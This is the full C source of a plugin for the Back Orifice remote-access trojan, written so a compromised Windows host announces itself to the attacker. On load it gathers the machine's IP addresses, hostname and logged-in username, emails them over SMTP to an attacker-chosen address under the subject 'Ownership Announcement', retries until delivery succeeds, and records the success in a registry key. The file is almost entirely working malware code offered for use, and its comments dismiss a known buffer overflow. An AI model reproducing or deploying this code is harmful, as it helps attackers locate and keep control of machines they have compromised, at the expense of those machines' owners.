/////////////////////////////////////////////////////////////////
// ButtTrumpet.c
//  A Back Orifice plugin -- used to send a single email to 
//  a (hopefully anonymous) email address announcing the IP
//  address of the currently running Back Orifice server.
// Written by Brian Enigma <enigma@netninja.com>
// Sendmail/SMTP code based partly on code by Arnab Bhaduri, 
// which originally appeared in the June 1998 issue of Windows
// Developer's Journal.
/////////////////////////////////////////////////////////////////
// Be sure to link this with Wsock32.lib

//#define DEBUG_MODE

#define	VERIFY_RET_VAL( arg ) \
            { int nRet = arg; if( nRet ) return nRet; }
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/timeb.h>
#include <process.h>
#include "ButtTrumpet.h"

#define REGISTRY_READ 0
#define REGISTRY_WRITE 1

/////////////////////////////////////////////////////////////////

int announce(void);
int SendMailMessage(void); 
int Send( SOCKET s, const char *lpszBuff, int nLen, int nFlags );
int Receive( SOCKET s, LPTSTR lpszBuff, int nLenMax, int nFlags,
			  LPCTSTR lpszReplyCode );
void myIP(char *result);
int registryOperation(int mode);

int *killMeNot;

/////////////////////////////////////////////////////////////////
// Static variables
static char   gszMailerID[] = "X-Mailer: Back Orifice Butt Trumpet V1.0\r\n";

/////////////////////////////////////////////////////////////////
//Variables to hold our parameters
char mailHost[255];
char mailDestination[255];

////////////////////////////////////////////////////////////////
// For logging/debugging the DLL on the remote server
#ifdef DEBUG_MODE
void logAction(char *message)
{
	FILE *f;
	f = fopen("c:\\bt.log", "at");
	if (!f)
		return;
	fprintf(f, "%s\n", message);
	fclose(f);
}
#else
__inline void logAction(char *message)
{
	return;
}
#endif

/////////////////////////////////////////////////////////////////
// announce - sends an SMTP mail message to specified host. This
// is the only exported function from this DLL.
int announce(void)
{
WORD    wVersion = MAKEWORD( 1, 1 );
WSADATA wsaData;
int     nRet;

logAction("Opening Winsock");
if (WSAStartup(wVersion, &wsaData))
    return 1;

// Try to send the message
logAction("Sending Message");
nRet = SendMailMessage();

// cleanup socket lib and log file
WSACleanup();

return nRet;
}


/////////////////////////////////////////////////////////////////
// SendMailMessage - actually talks SMTP and sends the message
// 0 is returned for success, otherwise the appropriate Winsock
// error code (WSAGetLastError()) is returned.
int SendMailMessage(void)
{
	char *host = &mailHost[0];					//Server through which to route mail
	char *emailAddress = &mailDestination[0];	//Account to send mail
	char   szBuff[ MAX_LINE_SIZE + 1 ]; // transmit/receive buffer
	char   szUser[ MAX_NAME_SIZE + 1 ]; // user name buffer
	char   szName[ MAX_NAME_SIZE + 1 ]; // host name buffer
	char message[1024];
	char tempName[30];
	DWORD  dwSize = MAX_NAME_SIZE;
	SOCKET s;

	struct hostent    *ph;
	struct sockaddr_in addr;

	char         szTime[ MAX_NAME_SIZE + 1 ]; // time related vars
	time_t       tTime;
	struct tm   *ptm;
	struct timeb tbTime;

	// connect to the SMTP port on remote host
	if( (s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
		return WSAGetLastError();

	if( isdigit(host[0]) && strchr(host, '.') )
		// ^^^ I forget...are numeric characters allowed as the first character of a
		//     domain name?  If so, Mr. Bhaduri's code is messed up.
		{
		unsigned long iaddr = inet_addr( host );
		ph = gethostbyaddr( (const char *)&iaddr, 4, PF_INET );
		}
	else
		ph = gethostbyname( host );

	if( ph == NULL )
		return WSAGetLastError();

	addr.sin_family = AF_INET;
	addr.sin_port   = htons( SMTP_PORT );
	memcpy( &addr.sin_addr, ph->h_addr_list[0],
			sizeof(struct in_addr) );

	if( connect(s, (struct sockaddr *)&addr, sizeof(struct sockaddr)) )
		return WSAGetLastError();

	// receive signon message
	VERIFY_RET_VAL( Receive( s, szBuff, MAX_LINE_SIZE, 0, "220" ); );

	// get user name and local host name
	GetUserName( szUser, &dwSize );
	gethostname( szName, MAX_NAME_SIZE );

	// build a quick message
	myIP(tempName);
	sprintf(message, "\r\n    Hello,\r\nMy address is:\r\n%s\r\n(%s::%s)\r\n",
				tempName,
				szName, szUser);

	// send HELO message
	sprintf( szBuff, "HELO %s\r\n", szName );
	VERIFY_RET_VAL( Send( s, szBuff, strlen(szBuff), 0 ); )
	VERIFY_RET_VAL( Receive( s, szBuff, MAX_LINE_SIZE, 0, "250" ); )

	// send MAIL message
		sprintf( szBuff, "MAIL FROM:%s@%s\r\n", szUser, szName );
		// ^^ Yeah, someone might buffer-overflow this program.  Tough cookies.

	VERIFY_RET_VAL( Send( s, szBuff, strlen(szBuff), 0 ); )
	VERIFY_RET_VAL( Receive( s, szBuff, MAX_LINE_SIZE, 0, "250" ); )

	// send RCPT message
	sprintf( szBuff, "RCPT TO: %s\r\n", emailAddress );
	VERIFY_RET_VAL( Send( s, szBuff, strlen(szBuff), 0 ); )
	VERIFY_RET_VAL( Receive( s, szBuff, MAX_LINE_SIZE, 0, "25" ); )

	// send DATA message
	sprintf( szBuff, "DATA\r\n" );
	VERIFY_RET_VAL( Send( s, szBuff, strlen(szBuff), 0 ); )
	VERIFY_RET_VAL( Receive( s, szBuff, MAX_LINE_SIZE, 0, "354" ); )

	// construct date string
	tTime = time( NULL );
	ptm   = localtime( &tTime );

	strftime( szTime, MAX_NAME_SIZE, "%a, %d %b %Y %H:%M:%S %Z", ptm );

	// find time zone offset and correct for DST
	ftime( &tbTime );
	if( tbTime.dstflag )
		tbTime.timezone -= 60;

	sprintf( szTime + strlen(szTime), " %2.2d%2.2d",
			 -tbTime.timezone / 60, tbTime.timezone % 60 );

	// send mail headers
	// Date:
	sprintf( szBuff, "Date: %s\r\n", szTime );
	VERIFY_RET_VAL( Send( s, szBuff, strlen(szBuff), 0 ); )

	// X-Mailer:
	VERIFY_RET_VAL( Send( s, gszMailerID, strlen(gszMailerID), 0 ); )

	// To:
	sprintf( szBuff, "To: %s", emailAddress );
	strcat( szBuff, "\r\n" );
	VERIFY_RET_VAL( Send( s, szBuff, strlen(szBuff), 0 ); )

	sprintf( szBuff, "From: %s@%s\r\n", "ButtTrumpet", szName );
	VERIFY_RET_VAL( Send( s, szBuff, strlen(szBuff), 0 ); )

	// Subject:
	sprintf( szBuff, "Subject: %s\r\n", "Ownership Announcement" );
	VERIFY_RET_VAL( Send( s, szBuff, strlen(szBuff), 0 ); )

	// send message text
	VERIFY_RET_VAL( Send( s, message, strlen(message), 0 ); )
		//  ^^ It would be bad to include a "\r\n.\r\n" in the body of the message...
		//     ...no escape sequences used.  If you intentionally do so, you are a
		//     naughty monkey.

	// send message terminator and receive reply
	VERIFY_RET_VAL( Send( s, "\r\n.\r\n", 5, 0 ); )
	VERIFY_RET_VAL( Receive( s, szBuff, MAX_LINE_SIZE, 0, "250" ); )

	// send QUIT message
	sprintf( szBuff, "QUIT\r\n" );
	VERIFY_RET_VAL( Send( s, szBuff, strlen(szBuff), 0 ); )
	VERIFY_RET_VAL( Receive( s, szBuff, MAX_LINE_SIZE, 0, "221" ); )

	closesocket( s );
	return 0;
}


/////////////////////////////////////////////////////////////////
// Send - send the request to the SMTP server, and handle errors.
int Send( SOCKET s, const char *lpszBuff, int nLen, int nFlags )
{
	int nCnt = 0;

	while( nCnt < nLen )
		{
		int nRes = send( s, lpszBuff + nCnt, nLen - nCnt, nFlags );
		if( nRes == SOCKET_ERROR )
			return WSAGetLastError();
		else
			nCnt += nRes;
		}

	return 0;
}


/////////////////////////////////////////////////////////////////
// Receive - receive a reply from the SMTP server, and verify that
// the request has succeeded by checking against the specified
// reply code.
int Receive( SOCKET s, LPTSTR lpszBuff, int nLenMax, int nFlags,
			  LPCTSTR lpszReplyCode )
{
	LPTSTR p;
	int    nRes = recv( s, lpszBuff, nLenMax, nFlags );

	if( nRes == SOCKET_ERROR )
		return WSAGetLastError();
	else
		*( lpszBuff + nRes ) = '\0';


	// check reply code for success/failure
	p = strtok( lpszBuff, "\n" );
	while( p )
		{
		if( *(p + 3) == ' ' )
			{
			if( !strncmp(p, lpszReplyCode, strlen(lpszReplyCode)) )
				return 0;
			else
				{
				int nErr = 1;

				sscanf( p, "%d", &nErr );
				return -nErr;
				}
			}
		else
			p = strtok( NULL, "\n" );
		}

	return -1;
}

/////////////////////////////////////////////////////////////////
// myIP enumerates through the local machine's IP network interfaces
// and grabs each address.  They are stored in a preallocated buffer
// passed into the function.  Be sure you have enough space, or bad
// things may happen (Read: buffer overflows).  If there are more than
// 6 network interfaces in this machine (WOW!), then only the first
// six are returned.
//
void myIP(char *result)
{
	char dot[6];
	int iResult;
	int i = 0;
	u_long *ppIpNO;
	u_long *pIpNO;
	HOSTENT FAR *lphostent;
	u_long ipHO;
	unsigned char binIp[4];
	int iterations = 0;

	//Get local host name and crudely validate
	char szHostName[40];
	*result = 0;
	iResult = gethostname(szHostName, sizeof(szHostName));
	if ((iResult != 0) || (lstrcmp(szHostName, "")==0))
		return;

	//Lok up this host info via supplied name
	lphostent = gethostbyname(szHostName);
	if (lphostent == NULL)
		return;

	//Retreive first entry (might have multiple connects)
	do
	{
		iterations++;
		ppIpNO = (u_long *)lphostent->h_addr_list;
		if (ppIpNO+i == NULL)
			return;
		pIpNO = ((u_long *)*(ppIpNO+i));
		if (pIpNO == NULL)
			return;

	//convert back to host order, since SOCKADDR_IN expects that
		ipHO = ntohl(*pIpNO);

		binIp[0] = (BYTE)((ipHO & 0xff000000) >> 24);
		itoa(binIp[0], dot, 10);
		strcat(result,dot);
		binIp[1] = (BYTE)((ipHO & 0x00ff0000) >> 16);
		itoa(binIp[1], dot, 10);
		strcat(result, "."); strcat(result, dot);
		binIp[2] = (BYTE)((ipHO & 0x0000ff00) >> 8);
		itoa(binIp[2], dot, 10);
		strcat(result, "."); strcat(result, dot);
		binIp[3] = (BYTE)(ipHO & 0x000000ff);
		itoa(binIp[3], dot, 10);
		strcat(result,"."); strcat(result, dot);
		strcat(result,"\r\n");
		i++;
	} while ((pIpNO != NULL) && (iterations < 6));
	return;
}


/////////////////////////////////////////////////////////////////
// registry Operation will do one of two different things, depending
// on the passed parameter "mode"
//
// case REGISTRY_READ:
//   Reads the registry to see if an SMTP message has been successfully
//   sent in the past.  Returns a logical true or false.
// case REGISTRY_WRITE:
//   Writes into the registry that the SMTP message has been successfully
//   sent.  The return value of the function in this mode is undefined.
int registryOperation(int mode)
{
	HKEY k;
	DWORD dispo;
	DWORD ran;
	DWORD size = sizeof(ran);
	DWORD type;
	
	if (RegCreateKeyEx(HKEY_LOCAL_MACHINE, 
				   "SOFTWARE\\NinjaSoft\\BT",
				   0, NULL, REG_OPTION_NON_VOLATILE,
				   KEY_ALL_ACCESS, NULL, &k, &dispo)
		!= ERROR_SUCCESS)
		return 0;
	//ASSERT: Key is open and valid
	switch(mode)
	{
	case REGISTRY_READ:
		//Read the value.  If unsuccessful, it probably doesn't
		// exist, so poke a zero into our undefined variable.
		if (RegQueryValueEx(k, "RunSuccess", 0,	&type, (unsigned char *)&ran, &size)
			!= ERROR_SUCCESS)
			ran = 0;
		break;
	case REGISTRY_WRITE:
		RegSetValueEx(k, "RunSuccess", 0, REG_DWORD, (unsigned char *)&ran, sizeof(ran));
		ran = 0;
		break;
	default:
		ran = 0;
		break;
	}
	RegCloseKey(k);
	return ran;
}

/////////////////////////////////////////////////////////////////
// workerThread is the heart of the program.  It determines whether
// an SMTP message needs to be sent--and if so, attempts to send
// it (repeatedly)
// Originally, it was supposed to run as a seperate thread, but
// funky things started happening, so it takes over as the DLL's
// foreground thread.
// If BO needs to terminate, this function exits.
//
//DWORD WINAPI workerThread(LPVOID dummy)
void __cdecl workerThread(void *dummy)
{
	int fourSecondTick;

	logAction("Thread Started");
	if (registryOperation(REGISTRY_READ))
	{
		logAction("Thread termination: message already sent");
		return;
	}
	do{
		if (announce()==0)
		{
			logAction("Thread termination: send successful!");
			registryOperation(REGISTRY_WRITE);
			return;
		}
		logAction("Delay: Send unsuccessful");
		//Delay, but monitor for a kill request
		for(fourSecondTick=0; 
			fourSecondTick < (60*5)/5;
			fourSecondTick++)
		{
			if (!killMeNot)
				return;
			Sleep(400);
		}
	}while (1);
	return;
}

/////////////////////////////////////////////////////////////////
// External entrypoint for the DLL.  All it does is parse the
// arguments into global variables, set a global pointer to the
// "active" parameter (so it can gracefully shut down if BO needs
// to shut down), then call the worker thread (not as a seperate
// thread, because odd things began to happen).
//
__declspec ( dllexport )	
	char * WINAPI start(int *active, char *args)
{
//	DWORD junk;
	char *p;
	char *q;
	int count;

	killMeNot = active;
	//Parse the arguments
	logAction("Parsing Arguments:");
	logAction(args);
	memset(mailHost, 0, sizeof(mailHost));
	memset(mailDestination, 0, sizeof(mailDestination));
	for(p = args, count=0; p && (*p) && (*p!=','); p++,count++)
		;
	if (count)
		strncpy(mailHost, args, count);
	for(q = ++p, count=0; p && (*p) && (*p!=','); p++,count++)
		;
	if (count)
		strncpy(mailDestination, q, count);
	logAction(mailHost);
	logAction(mailDestination);
	if ((mailHost[0]==0)||(mailDestination[0]==0))
	{
		logAction("No host or email address given.  Aborting");
		return NULL;
	}
	
	logAction("Thread starting");
//	CreateThread(NULL, 0, workerThread, NULL, 0, &junk);
//	_beginthread(workerThread, 0, NULL);
	workerThread(NULL);
	return NULL;
}

/////////////////////////////////////////////////////////////////
// DllMain
BOOL WINAPI DllMain (HANDLE hModule, DWORD dwReason, LPVOID lpReserved)
{
	switch(dwReason)
	{
	case DLL_PROCESS_ATTACH:
		logAction("DLL Attached");
		killMeNot = NULL;
		break;
	case DLL_PROCESS_DETACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	default:
		break;
	}
	return TRUE;
}
